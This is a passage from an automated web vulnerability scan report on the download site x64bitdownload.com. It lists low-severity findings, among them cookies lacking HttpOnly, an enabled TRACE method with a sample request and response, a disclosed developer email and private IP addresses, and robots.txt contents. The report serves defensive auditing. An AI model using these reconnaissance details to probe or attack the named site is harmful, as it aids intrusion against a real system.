Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.100. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.101. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.102. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.103. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.104. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.105. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.106. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.107. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.108. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.109. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.110. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.111. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.112. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.113. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.114. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.115. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7. TRACE method is enabled previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.x64bitdownload.com
Cookie: be57fe7a3b8d4ea7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:55 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.x64bitdownload.com
Cookie: be57fe7a3b8d4ea7

8. Email addresses disclosed previous next
There are 2 instances of this issue:

/js/rating.js
/templates/X64/css/rating.css

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

8.1. http://www.x64bitdownload.com/js/rating.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/rating.js

Issue detail

The following email address was disclosed in the response:

ryan@masugadesign.com

Request

GET /js/rating.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:40 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 29 Oct 2010 10:56:13 GMT
ETag: "14e3ae8-2c36-493bf4e90ed40"
Accept-Ranges: bytes
Content-Length: 11318
Connection: close
Content-Type: application/x-javascript

/*
Behaviour v1.1 by Ben Nolan, June 2005. Based largely on the work
of Simon Willison (see comments by Simon below).

Description:

Uses css selectors to apply javascript behaviours to e
...[SNIP]...
rating.js
Created: Aug 2006
Last Mod: Mar 11 2007
Handles actions and requests for rating bars.
---------------------------------------------------------
ryan masuga, masugadesign.com
ryan@masugadesign.com
Licensed under a Creative Commons Attribution 3.0 License.
http://creativecommons.org/licenses/by/3.0/
See readme.txt for full credit details.
---------------------------------------------------------
...[SNIP]...

8.2. http://www.x64bitdownload.com/templates/X64/css/rating.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The following email address was disclosed in the response:

ryan@masugadesign.com

Request

GET /templates/X64/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:40 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 26 Jun 2009 10:56:03 GMT
ETag: "14e3ae9-881-46d3e2fba96c0"
Accept-Ranges: bytes
Content-Length: 2177
Connection: close
Content-Type: text/css

/* styles for the unit rater
---------------------------------------------------------
ryan masuga, masugadesign.com
ryan@masugadesign.com
Licensed under a Creative Commons Attribution 3.0 License.
http://creativecommons.org/licenses/by/3.0/
See readme.txt for full credit details.
---------------------------------------------------------
...[SNIP]...

9. Private IP addresses disclosed previous next
There are 3 instances of this issue:

/64-bit-news-downloads.html
/64-bit-ssl-downloads.html
/64-bit-synchronization-downloads.html

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

9.1. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.1.1.4

Request

Response

9.2. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.0.1

Request

Response

9.3. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.1.1.4

Request

Response

10. Robots.txt file previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.x64bitdownload.com

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:56 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 14 Oct 2009 09:53:31 GMT
ETag: "14e046e-cd-475e222a2dcc0"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /rss/

User-agent: MSNBot
Disallow: /rss/

User-agent: Slurp
Disallow: /rss/

User-agent: *
Disallow: /write-review.html
Disallow: /saved-software.html
Disallow: /rd.ht
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 10:49:47 CST 2011.